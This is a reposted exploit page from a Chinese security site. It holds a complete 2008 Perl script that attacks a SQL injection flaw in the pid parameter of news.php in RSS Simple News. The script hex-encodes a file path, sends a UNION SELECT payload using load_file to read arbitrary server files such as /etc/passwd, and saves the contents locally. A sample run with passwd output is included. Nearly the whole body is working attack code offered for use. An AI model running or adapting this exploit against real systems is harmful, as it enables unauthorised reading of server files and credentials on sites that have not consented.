首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RSS Simple News (news.php pid) Remote SQL Injection Exploit
来源:piker(dot)ther00t(at)gmail(dot)com 作者:Piker 发布时间:2008-12-23  
#!/usr/bin/perl
################################
##    Coded by Piker [piker(dot)ther00t(at)gmail(dot)com]
##      D.O.M Team
## piker,ka0x,an0de,xarnuz
## 2008 Security Researchers
################################
##
## RSS Simple News Remote SQL Injection Exploit
## http://sourceforge.net/projects/rss-simple-news/
##
##   This exploit tries to read an
##   arbitrary file.
##
##   It needs magic_quotes_gpc=off
##
################################

# piker@domlabs:~/advisories$ perl rss.pl http://localhost/rss /etc/passwd
#[+] File HEX: 0x2f6574632f706173737764
#[+] Host: http://localhost/rss/
#[+] File content:
#daemon:x:1:1:daemon:/usr/sbin:/bin/sh
#bin:x:2:2:bin:/bin:/bin/sh
#sys:x:3:3:sys:/dev:/bin/sh
#sync:x:4:65534:sync:/bin:/bin/sync
#games:x:5:60:games:/usr/games:/bin/sh
# [...]
#[+] EOF
#
#


use LWP::UserAgent;

open(FILE, ">&STDOUT");

my $host = $ARGV[0];
my $file = $ARGV[1];

die &_USO unless $ARGV[1];

sub _USO
{
    die "
    RSS Simple News Remote Sql Injection Exploit

    This exploit tries to read an
    arbitrary file.

    It needs magic_quotes_gpc=off

    usage: ./$0 <host> <file_you_want>
    ex: ./$0 http://localhost/rss/ /etc/passwd

    ";
}

my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");

my $tmp="0x";
my $tmp2;

foreach my $c (split(//, $file)){
    $tmp2 = sprintf ("%x", ord($c));
    $tmp .= $tmp2;
}

print FILE "[+] File HEX: ".$tmp."\n";

if ($host !~ /\/$/){ $host .= "/"; }

print FILE "[+] Host: ".$host."\n";

my $req = HTTP::Request->new(GET => $host."news.php?pid=-1' union select 1,2,3,4,CONCAT(0x3c46494c453e,load_file(".$tmp."),0x3c46494c453e),6 and 'a'='a");
my $res = $ua->request($req);
my $con = $res->content;

my $ok = 0;
open (OUT, ">result.txt");

if ($res->is_success){
    foreach my $linea (split(/\n/, $con)){
        if($ok == 1){
            if ($linea !~ /<FILE>/){
                print FILE $linea."\n";
        print OUT $linea."\n";
            }else{
                print FILE "\n[+] EOF\n";
        print "\n[+] File saved into 'result.txt'\n";
                goto salida;
            }
        }
        if($linea =~ /<FILE>/i && $ok == 0){
            $ok = 1;
            print FILE "[+] File content: \n";
        }
    }
    salida:
    if ($ok == 0){
        print FILE "[-] Exploit Failed!\n";
    }     
}
else{
    print FILE "[-] Exploit Failed!\n";
}

close(FILE);
close(OUT);

#EOF

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CoolPlayer 2.19 (Skin File) Lo
·Pligg 9.9.5b (check_url.php ur
·Linksys Wireless ADSL Router (
·YourPlace <= 1.0.2 Multiple Re
·CoolPlayer 2.19 (Skin File) Lo
·OneOrZero helpdesk 1.6.*. Remo
·SolarCMS 0.53.8 (Forum) Remote
·ReVou Twitter Clone Admin Pass
·MyPBS (index.php seasonID) Rem
·Avahi < 0.6.24 (mDNS Daemon) R
·CUPS < 1.3.8-4 (pstopdf filter
·Mozilla Firefox 3.0.5 location
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved